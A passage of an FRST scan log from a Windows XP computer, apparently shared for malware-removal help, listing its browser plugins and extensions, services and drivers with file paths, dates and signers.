    FF ProfilePath: C:\Documents and Settings\RAUL_104\Application Data\Mozilla\Firefox\Profiles\ksds0365.default
    FF DefaultSearchEngine: Google
    FF DefaultSearchEngine.US: Google
    FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_17_0_0_134.dll [2015-03-24] ()
    FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2012-10-31] ()
    FF Plugin: @divx.com/DivX Browser Plugin,version=1.0.0 -> C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll [2011-12-13] (DivX, LLC)
    FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll [2011-06-20] (DivX, LLC.)
    FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\WINDOWS\system32\npDeployJava1.dll [2013-09-08] (Oracle Corporation)
    FF Plugin: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2013-09-08] (Oracle Corporation)
    FF Plugin: @logitech.com/HarmonyRemote,version=1.0.0 -> C:\Program Files\Logitech\Harmony Remote Driver\NprtHarmonyPlugin.dll [2012-09-28] (Logitech Inc.)
    FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2014-04-25] ()
    FF Plugin: @mcafee.com/MVT -> C:\Program Files\McAfee\Supportability\MVT\NPMVTPlugin.dll [2013-02-05] (McAfee, Inc.)
    FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
    FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
    FF Plugin: @movenetworks.com/Quantum Media Player -> C:\Documents and Settings\RAUL_104\Application Data\Move Networks\plugins\npqmp071701000002.dll [2009-12-06] (Move Networks)
    FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-05] (Google Inc.)
    FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-05] (Google Inc.)
    FF Plugin: @viewpoint.com/VMP -> C:\Program Files\Viewpoint\Viewpoint Media Player\npViewpoint.dll [2007-04-16] ()
    FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2012-12-18] (Adobe Systems Inc.)
    FF Plugin HKU\S-1-5-21-515967899-117609710-839522115-1004: @movenetworks.com/Quantum Media Player -> C:\Documents and Settings\RAUL_104\Application Data\Move Networks\plugins\npqmp071701000002.dll [2009-12-06] (Move Networks)
    FF Plugin HKU\S-1-5-21-515967899-117609710-839522115-1004: @tools.google.com/Google Update;version=3 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-04] (Google Inc.)
    FF Plugin HKU\S-1-5-21-515967899-117609710-839522115-1004: @tools.google.com/Google Update;version=9 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-04] (Google Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npDivxPlayerPlugin.dll [2009-05-18] (DivX, Inc)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npdnu.dll [2009-07-07] (AOL LLC)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npdnupdater2.dll [2009-07-07] (AOL LLC)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2012-12-18] (Adobe Systems Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin7.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npViewpoint.dll [2007-04-16] ()
    FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2014-12-20]
    FF Extension: Microsoft .NET Framework Assistant - C:\Documents and Settings\RAUL_104\Application Data\Mozilla\Firefox\Profiles\ksds0365.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2012-02-28]
    FF Extension: Skype Click to Call - C:\Program Files\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2015-03-24]
    FF Extension: Skype Click to Call - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2015-03-24]
    FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
    FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-07]
    FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\SiteAdvisor
    FF Extension: McAfee SiteAdvisor - C:\Program Files\McAfee\SiteAdvisor [2012-06-24]
    FF HKLM\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5
    FF Extension: No Name - C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2012-08-29]
    FF HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Firefox\Extensions: [[email protected]] - C:\Documents and Settings\RAUL_104\Application Data\Move Networks
    FF Extension: Move Media Player - C:\Documents and Settings\RAUL_104\Application Data\Move Networks [2009-03-27]

    Chrome:
    =======
    CHR Profile: C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default
    CHR Extension: (YouTube) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-16]
    CHR Extension: (Google Search) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-16]
    CHR Extension: (SiteAdvisor) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-02-26]
    CHR Extension: (Skype Click to Call) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2013-08-20]
    CHR Extension: (Google Wallet) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-02-26]
    CHR Extension: (MyHarmony Chrome Plugin) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\omaonpoimgkmbllpdihbnmgphjoipdhf [2015-02-26]
    CHR Extension: (Gmail) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-16]
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files\McAfee\SiteAdvisor\McChPlg.crx [2012-06-24]
    CHR HKLM\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files\Skype\Toolbars\Skype for Chromium\skype_chrome_extension.crx [2013-10-09]
    CHR HKLM\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - No Path Or update_url value
    CHR HKLM\...\Chrome\Extension: [omaonpoimgkmbllpdihbnmgphjoipdhf] - C:\Program Files\Logitech\Harmony Remote Driver\harmony_chrome.crx [2014-01-28]
    StartMenuInternet: chrome.exe - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\Application\chrome.exe

    ========================== Services (Whitelisted) =================

    (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

    R2 ABBYY.Licensing.FineReader.Corporate.11.0; C:\Program Files\Common Files\ABBYY\FineReader\11.00\Licensing\CE\NetworkLicenseServer.exe [818952 2011-12-22] (ABBYY)
    S4 ACDaemon; C:\Program Files\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
    S4 Alerter; C:\WINDOWS\system32\alrsvc.dll [17408 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 ALG; C:\WINDOWS\System32\alg.exe [44544 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 Ati HotKey Poller; C:\WINDOWS\system32\Ati2evxx.exe [602112 2010-05-27] (ATI Technologies Inc.) [File not signed]
    R2 AudioSrv; C:\WINDOWS\System32\audiosrv.dll [42496 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 AVGIDSAgent; C:\Program Files\AVG\AVG2015\avgidsagent.exe [3411408 2015-02-19] (AVG Technologies CZ, s.r.o.)
    R2 avgwd; C:\Program Files\AVG\AVG2015\avgwdsvc.exe [308720 2015-02-19] (AVG Technologies CZ, s.r.o.)
    S4 BITS; C:\WINDOWS\system32\qmgr.dll [409088 2008-04-13] (Microsoft Corporation) [File not signed]
    S2 Browser; C:\WINDOWS\System32\browser.dll [78336 2012-07-06] (Microsoft Corporation) [File not signed]
    S2 ccEvtMgr; C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe [255136 2003-10-20] () [File not signed]
    S3 ccPwdSvc; C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe [87200 2003-10-20] () [File not signed]
    S2 ccSetMgr; C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe [234656 2003-10-20] () [File not signed]
    S3 CiSvc; C:\WINDOWS\system32\cisvc.exe [5632 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 ClipSrv; C:\WINDOWS\system32\clipsrv.exe [33280 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 Creative Service for CDROM Access; C:\WINDOWS\system32\CTSvcCDA.EXE [44032 1999-12-13] (Creative Technology Ltd) [File not signed]
    R2 CryptSvc; C:\WINDOWS\System32\cryptsvc.dll [62464 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 DcomLaunch; C:\WINDOWS\system32\rpcss.dll [401408 2009-02-09] (Microsoft Corporation) [File not signed]
    R2 Dhcp; C:\WINDOWS\System32\dhcpcsvc.dll [126976 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 dleaCATSCustConnectService; C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\\dleaserv.exe [98984 2010-01-07] ()
    R2 dlea_device; C:\WINDOWS\system32\dleacoms.exe [598696 2010-01-07] ( )
    S3 dmadmin; C:\WINDOWS\System32\dmadmin.exe [224768 2008-04-13] (Microsoft Corp., Veritas Software) [File not signed]
    S3 dmserver; C:\WINDOWS\System32\dmserver.dll [23552 2008-04-13] (Microsoft Corp.) [File not signed]
    R2 Dnscache; C:\WINDOWS\System32\dnsrslvr.dll [45568 2009-04-20] (Microsoft Corporation) [File not signed]
    S3 Dot3svc; C:\WINDOWS\System32\dot3svc.dll [132096 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 EapHost; C:\WINDOWS\System32\eapsvc.dll [33792 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 ERSvc; C:\WINDOWS\System32\ersvc.dll [23040 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 Eventlog; C:\WINDOWS\system32\services.exe [110592 2009-02-06] (Microsoft Corporation) [File not signed]
    R3 EventSystem; C:\WINDOWS\system32\es.dll [253952 2008-07-07] (Microsoft Corporation) [File not signed]
    R3 FastUserSwitchingCompatibility; C:\WINDOWS\System32\shsvcs.dll [135168 2009-07-27] (Microsoft Corporation) [File not signed]
    R2 FlipShare Service; C:\Program Files\Flip Video\FlipShare\FlipShareService.exe [455944 2010-05-14] ()
    R2 helpsvc; C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll [38400 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 HidServ; C:\WINDOWS\System32\hidserv.dll [21504 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 hkmsvc; C:\WINDOWS\System32\kmsvc.dll [61440 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
    R3 HTTPFilter; C:\WINDOWS\System32\w3ssl.dll [15872 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 ImapiService; C:\WINDOWS\system32\imapi.exe [150528 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 ioloSystemService; C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe [4700872 2014-08-12] (iolo technologies, LLC)
    S4 JavaQuickStarterService; C:\Program Files\Java\jre7\bin\jqs.exe [182184 2013-09-08] (Oracle Corporation)
    R2 lanmanserver; C:\WINDOWS\System32\srvsvc.dll [99840 2010-08-27] (Microsoft Corporation) [File not signed]
    R2 lanmanworkstation; C:\WINDOWS\System32\wkssvc.dll [132096 2009-06-10] (Microsoft Corporation) [File not signed]
    R2 LmHosts; C:\WINDOWS\System32\lmhsvc.dll [13824 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 McAfee SiteAdvisor Service; C:\Program Files\McAfee\SiteAdvisor\McSACore.exe [132160 2015-03-11] (McAfee, Inc.)
    R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [145568 2014-04-25] (McAfee, Inc.)
    U2 mcbootdelaystartsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
    R2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
    R2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
    S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [472072 2014-09-04] (McAfee, Inc.)
    R2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
    R2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
    R2 MemeoBackgroundService; C:\Program Files\WD\WD Anywhere Backup\MemeoBackgroundService.exe [25824 2009-04-17] (Memeo)
    S4 Messenger; C:\WINDOWS\System32\msgsvc.dll [33792 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [655936 2014-08-20] (McAfee, Inc.)
    R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [169800 2014-06-20] (McAfee, Inc.)
    R2 mfevtp; C:\WINDOWS\system32\mfevtps.exe [179600 2015-02-11] (McAfee, Inc.)
    S3 mnmsrvc; C:\WINDOWS\system32\mnmsrvc.exe [32768 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 MotoHelper; C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe [223088 2011-04-26] ()
    S3 MSDTC; C:\WINDOWS\system32\msdtc.exe [6144 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 MSIServer; C:\WINDOWS\System32\msiexec.exe [78848 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 napagent; C:\WINDOWS\System32\qagentrt.dll [291328 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 NetDDE; C:\WINDOWS\system32\netdde.exe [111104 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 NetDDEdsdm; C:\WINDOWS\system32\netdde.exe [111104 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 Netlogon; C:\WINDOWS\system32\lsass.exe [13312 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Netman; C:\WINDOWS\System32\netman.dll [198144 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Nla; C:\WINDOWS\System32\mswsock.dll [245248 2008-06-20] (Microsoft Corporation) [File not signed]
    S3 NtLmSsp; C:\WINDOWS\system32\lsass.exe [13312 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 NtmsSvc; C:\WINDOWS\system32\ntmssvc.dll [435200 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 PLFlash DeviceIoControl Service; C:\Program Files\Nero\Nero BackItUp 4\IoctlSvc.exe [81920 2008-09-24] (Prolific Technology Inc.) [File not signed]
    R2 PlugPlay; C:\WINDOWS\system32\services.exe [110592 2009-02-06] (Microsoft Corporation) [File not signed]
    R2 PolicyAgent; C:\WINDOWS\system32\lsass.exe [13312 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 ProtectedStorage; C:\WINDOWS\system32\lsass.exe [13312 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 RasAuto; C:\WINDOWS\System32\rasauto.dll [88576 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 RasMan; C:\WINDOWS\System32\rasmans.dll [186368 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 RDSessMgr; C:\WINDOWS\system32\sessmgr.exe [141312 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 RemoteAccess; C:\WINDOWS\System32\mprdim.dll [53248 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 RpcLocator; C:\WINDOWS\system32\locator.exe [75264 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 RpcSs; C:\WINDOWS\system32\rpcss.dll [401408 2009-02-09] (Microsoft Corporation) [File not signed]
    S3 RSVP; C:\WINDOWS\system32\rsvp.exe [132608 2004-08-04] (Microsoft Corporation) [File not signed]
    R2 SamSs; C:\WINDOWS\system32\lsass.exe [13312 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 SCardSvr; C:\WINDOWS\System32\SCardSvr.exe [95744 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 Schedule; C:\WINDOWS\system32\schedsvc.dll [192512 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 seclogon; C:\WINDOWS\System32\seclogon.dll [18944 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 SENS; C:\WINDOWS\system32\sens.dll [39424 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 SharedAccess; C:\WINDOWS\System32\ipnathlp.dll [331264 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 ShellHWDetection; C:\WINDOWS\System32\shsvcs.dll [135168 2009-07-27] (Microsoft Corporation) [File not signed]
    S4 Skype C2C Service; C:\Documents and Settings\All Users\Application Data\Skype\Toolbars\Skype C2C Service\c2c_service.exe [3275136 2013-10-09] (Skype Technologies S.A.)
    R2 Spooler; C:\WINDOWS\system32\spoolsv.exe [58880 2010-08-17] (Microsoft Corporation) [File not signed]
    R2 srservice; C:\WINDOWS\system32\srsvc.dll [171008 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 SSDPSRV; C:\WINDOWS\System32\ssdpsrv.dll [71680 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 stisvc; C:\WINDOWS\system32\wiaservc.dll [333824 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 svcboot_tdcreqqfu; C:\WINDOWS\system32\iherf\svcboot_tdcreqqfu.dll [239944 2013-09-26] ()
    S3 SysmonLog; C:\WINDOWS\system32\smlogsvc.exe [89600 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 TapiSrv; C:\WINDOWS\System32\tapisrv.dll [249856 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 TermService; C:\WINDOWS\System32\termsrv.dll [295424 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 Themes; C:\WINDOWS\System32\shsvcs.dll [135168 2009-07-27] (Microsoft Corporation) [File not signed]
    R2 TrkWks; C:\WINDOWS\system32\trkwks.dll [90112 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 upnphost; C:\WINDOWS\System32\upnphost.dll [185856 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 UPS; C:\WINDOWS\System32\ups.exe [18432 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 Viewpoint Manager Service; C:\Program Files\Viewpoint\Common\ViewpointService.exe [24652 2007-01-04] (Viewpoint Corporation) [File not signed]
    S3 VSS; C:\WINDOWS\System32\vssvc.exe [289792 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 W32Time; C:\WINDOWS\system32\w32time.dll [175104 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 WDBtnMgrSvc.exe; C:\Program Files\Western Digital\WD Drive Manager\WDBtnMgrSvc.exe [102400 2009-05-27] (WDC) [File not signed]
    R2 WebClient; C:\WINDOWS\System32\webclnt.dll [68096 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [13592 2006-11-03] (Microsoft Corporation)
    R2 winmgmt; C:\WINDOWS\system32\wbem\WMIsvc.dll [144896 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 WiselinkPro; C:\Program Files\SAMSUNG\SAMSUNG PC Share Manager\WiselinkPro.exe [6795333 2008-03-03] () [File not signed]
    R2 WMDM PMSP Service; C:\WINDOWS\system32\MsPMSPSv.exe [53520 2000-06-26] (Microsoft Corporation) [File not signed]
    S3 WmdmPmSN; C:\WINDOWS\system32\MsPMSNSv.dll [27136 2006-10-18] (Microsoft Corporation) [File not signed]
    S3 WmiApSrv; C:\WINDOWS\system32\wbem\wmiapsrv.exe [126464 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 WMPNetworkSvc; C:\Program Files\Windows Media Player\WMPNetwk.exe [913408 2006-10-18] (Microsoft Corporation) [File not signed]
    S4 wscsvc; C:\WINDOWS\system32\wscsvc.dll [80896 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 wuauserv; C:\WINDOWS\system32\wuauserv.dll [6656 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 WudfSvc; C:\WINDOWS\System32\WUDFSvc.dll [55808 2006-09-28] (Microsoft Corporation) [File not signed]
    S2 WZCSVC; C:\WINDOWS\System32\wzcsvc.dll [483840 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 xmlprov; C:\WINDOWS\System32\xmlprov.dll [129024 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 WUSB54GCSVC; "C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\WLService.exe" "WUSB54GC.exe" [X]

    ==================== Drivers (Whitelisted) ====================

    (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

    S3 61883; C:\WINDOWS\System32\DRIVERS\61883.sys [48128 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 ACPI; C:\WINDOWS\System32\DRIVERS\ACPI.sys [187776 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 ACPIEC; C:\WINDOWS\system32\Drivers\ACPIEC.sys [11648 2004-08-04] (Microsoft Corporation) [File not signed]
    S3 aec; C:\WINDOWS\System32\drivers\aec.sys [142592 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 AegisP; C:\WINDOWS\System32\DRIVERS\AegisP.sys [20747 2009-03-26] (Meetinghouse Data Communications) [File not signed]
    R3 Afc; C:\WINDOWS\System32\drivers\Afc.sys [18688 2006-11-10] (Arcsoft, Inc.)
    R1 AFD; C:\WINDOWS\System32\drivers\afd.sys [138496 2011-08-17] (Microsoft Corporation) [File not signed]
    R0 agp440; C:\WINDOWS\System32\DRIVERS\agp440.sys [42368 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 AnyDVD; C:\WINDOWS\System32\Drivers\AnyDVD.sys [104512 2009-12-08] (SlySoft, Inc.)
    R3 Arp1394; C:\WINDOWS\System32\DRIVERS\arp1394.sys [60800 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 AsyncMac; C:\WINDOWS\System32\DRIVERS\asyncmac.sys [14336 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 atapi; C:\WINDOWS\System32\DRIVERS\atapi.sys [96512 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 ati2mtag; C:\WINDOWS\System32\DRIVERS\ati2mtag.sys [4830720 2010-05-27] (ATI Technologies Inc.) [File not signed]
    S3 Atmarpc; C:\WINDOWS\System32\DRIVERS\atmarpc.sys [59904 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 audstub; C:\WINDOWS\System32\DRIVERS\audstub.sys [3072 2001-08-17] (Microsoft Corporation) [File not signed]
    S3 Avc; C:\WINDOWS\System32\DRIVERS\avc.sys [38912 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Avgdiskx; C:\WINDOWS\System32\DRIVERS\avgdiskx.sys [121624 2014-06-18] (AVG Technologies CZ, s.r.o.)
    R1 AVGIDSDriverl; C:\WINDOWS\System32\DRIVERS\avgidsdriverlx.sys [202208 2015-02-19] (AVG Technologies CZ, s.r.o.)
    R0 AVGIDSHX; C:\WINDOWS\System32\DRIVERS\avgidshx.sys [154904 2014-11-18] (AVG Technologies CZ, s.r.o.)
    R1 AVGIDSShim; C:\WINDOWS\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-18] (AVG Technologies CZ, s.r.o.)
    R1 Avgldx86; C:\WINDOWS\System32\DRIVERS\avgldx86.sys [192792 2014-08-28] (AVG Technologies CZ, s.r.o.)
    R0 Avglogx; C:\WINDOWS\System32\DRIVERS\avglogx.sys [265184 2015-02-03] (AVG Technologies CZ, s.r.o.)
    R0 Avgmfx86; C:\WINDOWS\System32\DRIVERS\avgmfx86.sys [107488 2015-01-23] (AVG Technologies CZ, s.r.o.)
    R0 Avgrkx86; C:\WINDOWS\System32\DRIVERS\avgrkx86.sys [27416 2014-06-18] (AVG Technologies CZ, s.r.o.)
    R1 Avgtdix; C:\WINDOWS\System32\DRIVERS\avgtdix.sys [210400 2015-01-16] (AVG Technologies CZ, s.r.o.)
    S3 BCM42RLY; C:\WINDOWS\System32\BCM42RLY.SYS [17992 2005-02-01] (Broadcom Corporation) [File not signed]
    R1 Beep; C:\WINDOWS\system32\Drivers\Beep.sys [4224 2004-08-04] (Microsoft Corporation) [File not signed]
    S3 BTCFilterService; C:\WINDOWS\System32\DRIVERS\motfilt.sys [6016 2009-01-29] (Motorola Inc) [File not signed]
    S4 cbidf2k; C:\WINDOWS\system32\Drivers\cbidf2k.sys [13952 2004-08-04] (Microsoft Corporation) [File not signed]
    S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-13] (Microsoft Corporation) [File not signed]
    S1 Cdaudio; C:\WINDOWS\system32\Drivers\Cdaudio.sys [18688 2004-08-04] (Microsoft Corporation) [File not signed]
    R4 Cdfs; C:\WINDOWS\system32\Drivers\Cdfs.sys [63744 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Cdrom; C:\WINDOWS\System32\DRIVERS\cdrom.sys [62976 2008-04-13] (Microsoft Corporation) [File not signed]
    S0 cercsr6; C:\WINDOWS\system32\Drivers\cercsr6.sys [39904 2004-12-13] (Adaptec, Inc.) [File not signed]
    R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [62832 2014-06-20] (McAfee, Inc.)
    R3 ctac32k; C:\WINDOWS\System32\drivers\ctac32k.sys [135040 2003-02-20] (Creative Technology Ltd) [File not signed]
    R3 ctaud2k; C:\WINDOWS\System32\drivers\ctaud2k.sys [498688 2003-03-26] (Creative Technology Ltd) [File not signed]
    S3 ctdvda2k; C:\WINDOWS\System32\drivers\ctdvda2k.sys [287920 2003-03-27] (Creative Technology Ltd) [File not signed]
    R3 ctprxy2k; C:\WINDOWS\System32\drivers\ctprxy2k.sys [6144 2003-02-20] (Creative Technology Ltd) [File not signed]
    R3 ctsfm2k; C:\WINDOWS\System32\drivers\ctsfm2k.sys [135248 2003-02-20] (Creative Technology Ltd) [File not signed]
    R0 Disk; C:\WINDOWS\System32\DRIVERS\disk.sys [36352 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 dmboot; C:\WINDOWS\System32\drivers\dmboot.sys [799744 2008-04-13] (Microsoft Corp., Veritas Software) [File not signed]
    S4 dmio; C:\WINDOWS\System32\drivers\dmio.sys [153344 2008-04-13] (Microsoft Corp., Veritas Software) [File not signed]
    S4 dmload; C:\WINDOWS\System32\drivers\dmload.sys [5888 2004-08-04] (Microsoft Corp., Veritas Software.) [File not signed]
    S3 DMusic; C:\WINDOWS\System32\drivers\DMusic.sys [52864 2008-04-13] (Microsoft Corporation) [File not signed]
